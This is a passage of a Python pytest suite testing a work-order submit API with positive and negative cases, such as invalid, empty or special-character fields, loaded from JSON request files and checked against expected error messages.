self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_requesternonce_specialcharacters(
self):
test_id = '18736'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_requesterNonce_all_special_characters.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Empty or Invalid data format for requesterNonce")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_signingalgorithm_alternate(self):
test_id = '18614'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_alternate_worker_signing_algorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_hashingalgorithm_alternate(self):
test_id = '18704'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_alternate_hashing_algorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_requesterprivatekey_no(self):
test_id = '18612'
request_file = os.path.join(
env.work_order_input_file,
"work_order_without_requester_private_key.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_params_twiceheartdisease(self):
test_id = '18811'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_twice_params.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workloadid_invalid(self):
test_id = '18807'
request_file = os.path.join(
env.work_order_input_file,
"work_order_Submit_invalid_parameter_Workloadid.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Workload cannot be processed by this worker")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_methodname_list(self):
test_id = '18797'
request_file = os.path.join(
env.work_order_input_file,
"work_order_methodename_list.json")
# err_cd = \
# self.test_obj.setup_and_build_request_wo_submit(
# read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
read_json(request_file),
env.wo_submit_output_json_file_name,
read_json(request_file))
# result_response = self.test_obj.getresult(
# self.test_obj.build_request_output['request_obj'])
assert (
check_negative_test_responses(
submit_response,
"Invalid Request")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerEncryptionKey_special_character(self):
test_id = '18732'
request_file = os.path.join(
env.work_order_input_file,
"work_order_workerEncryptionKey_special_character.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Empty or Invalid dataformat for workerEncryptionKey")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_sdk_workerEncryptionKey_special_character(self):
with pytest.raises(ValueError,
match="Encrypting Session key failed: Invalid session key or worker encryption key"):
test_id = '21228'
request_file = os.path.join(
env.work_order_input_file,
"work_order_workerEncryptionKey_special_character.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerencryptionkey_empty(self):
test_id = '18705'
request_file = os.path.join(
env.work_order_input_file,
"work_order_worker_encryption_key.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Empty or Invalid dataformat for workerEncryptionKey")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_sdk_workerencryptionkey_empty(self):
with pytest.raises(ValueError, match="Empty or Invalid dataformat for workerEncryptionKey"):
test_id = '21229'
request_file = os.path.join(
env.work_order_input_file,
"work_order_worker_encryption_key.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_dataencryptionalgorithm_alternate(self):
test_id = '18706'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_alternate_dataEncryption_algorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Unsupported dataEncryptionAlgorithm found in the request")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
def test_workordersubmit_indexindata_50(self):
test_id = '18707'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_50_index_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_index_orderchange(self):
test_id = '18708'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_changing_order_index.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_indata_empty(self):
test_id = '18765'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_empty_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Indata is empty")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_indata_remove(self):
test_id = '18766'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_no_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing parameter inData")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_outdata_empty(self):
test_id = '18711'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_empty_outdata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
    # @pytest.mark.sdk (AttributeError: 'dict' object has no attribute 'to_jrpc_string')
def test_workordersubmit_indata_unknownparametervalue(self):
test_id = '18768'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_indata_unknown_parameter_value.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for in/out data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_index_negative(self):
test_id = '18769'
request_file = os.path.join(
env.work_order_input_file,
"work_order_negative_index.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indatahash_empty(self):
test_id = '18712'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_empty_indata_hash.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_datahash_randomstr(self):
test_id = '18772'
request_file = os.path.join(
env.work_order_input_file,
"work_order_datahash_random_str.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for data hash of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_data_multipleechoresult(self):
test_id = '18774'
request_file = os.path.join(
env.work_order_input_file,
"work_order_multiple_data_echoresult.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_echoclient(self):
test_id = '18808'
request_file = os.path.join(
env.work_order_input_file,
"work_order_echoclient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indata_alternatetextechoclient(self):
test_id = '18809'
request_file = os.path.join(
env.work_order_input_file,
"work_order_diff_text_data_indata_echoClient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indata_specialcharacter(self):
test_id = '18810'
request_file = os.path.join(
env.work_order_input_file,
"work_order_specialcharacter_data_single_index_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
# @pytest.mark.sdk
def test_workordersubmit_iv_specialcharacterechoclient(self):
test_id = '18786'
request_file = os.path.join(
env.work_order_input_file,
"work_order_special_char_iv_echoresult.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for initialization vector of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_requesterId_paramremove(self):
test_id = '18733'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_requesterId_param_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing parameter requesterId")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.negative
    def test_workordersubmit_responsetimeout_string(self):
        test_id = '18798'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_with_response_timeout_str.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for responseTimeoutMSecs")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_dataencryptionalgorithm_list(self):
        test_id = '18793'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_multiple_dataEncryptionAlgorithm.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for dataEncryptionAlgorithm")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_sdk_dataencryptionalgorithm_list(self):
        with pytest.raises(
                ValueError,
                match="Data Encryption Algorithm is not String"):
            test_id = '18793'
            request_file = os.path.join(
                env.work_order_input_file,
                "work_order_multiple_dataEncryptionAlgorithm.json")
            err_cd = \
                self.test_obj.setup_and_build_request_wo_submit(
                    read_json(request_file))
            submit_response = submit_request(
                self.test_obj.uri_client,
                self.test_obj.build_request_output['request_obj'],
                env.wo_submit_output_json_file_name,
                read_json(request_file))
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.positive
    def test_workordersubmit_workloadId_twoworkload(self):
        test_id = '18805'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_two_workloadid.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.p1
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_workorderId_null(self):
        test_id = '18717'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_WorkOrderId_null.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for work order id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_workerId_nullstring(self):
        test_id = '18718'
        request_file = os.path.join(
            env.work_order_input_file,
            "workorder_workerId_null_number_randomString.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for Worker id")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_workloadId_specialcharacters(self):
        test_id = '18730'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_workloadId_specialcharacters.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Workload cannot be processed by this worker")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.positive
    def test_workordersubmit_encrypteddataencryptionkey_nullechoclient(self):
        test_id = '18785'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_both_in_out_Data_EncryptionKey_null_echo.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_dataencryptionalgorithm_listsamealgotwice(self):
        test_id = '18788'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_dataEncryptionAlgorithm_list_same_algo_twice.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            check_negative_test_responses(
                result_response,
                "Invalid data format for dataEncryptionAlgorithm")
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_sdk_dataencryptionalgorithm_listsamealgotwice(self):
        with pytest.raises(
                ValueError,
                match="Data Encryption Algorithm is not String"):
            test_id = '18788'
            request_file = os.path.join(
                env.work_order_input_file,
                "work_order_submit_dataEncryptionAlgorithm_list_same_algo_twice.json")
            err_cd = \
                self.test_obj.setup_and_build_request_wo_submit(
                    read_json(request_file))
            submit_response = submit_request(
                self.test_obj.uri_client,
                self.test_obj.build_request_output['request_obj'],
                env.wo_submit_output_json_file_name,
                read_json(request_file))
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.set1
    @pytest.mark.positive
    def test_workordersubmit_encrypteddataencryptionkey_hyphenechoclient(self):
        test_id = '20366'
        request_file = os.path.join(
            env.work_order_input_file,
            "work_order_submit_inData_outData_encryptedDataEncryptionKey_hyphen_echoClient.json")
        err_cd = \
            self.test_obj.setup_and_build_request_wo_submit(
                read_json(request_file))
        submit_response = submit_request(
            self.test_obj.uri_client,
            self.test_obj.build_request_output['request_obj'],
            env.wo_submit_output_json_file_name,
            read_json(request_file))
        result_response = self.test_obj.getresult(
            self.test_obj.build_request_output['request_obj'],
            submit_response)
        assert (
            verify_test(
                result_response, 0,
                self.test_obj.build_request_output['pre_test_output'],
                self.test_obj.build_request_output['action_obj'])
            == ResultStatus.SUCCESS.value)
        logger.info('\t\t!!! Test completed !!!\n\n')

    @pytest.mark.workordersubmit
    @pytest.mark.listener
    @pytest.mark.sdk
    @pytest.mark.fabric
    @pytest.mark.ethereum
    @pytest.mark.set1
    @pytest.mark.negative
    def test_workordersubmit_encrypteddataencryptionkey_remove(self):
        test_id = '18754'
        request_file = os.path.join(
            env.work_order_input_file,
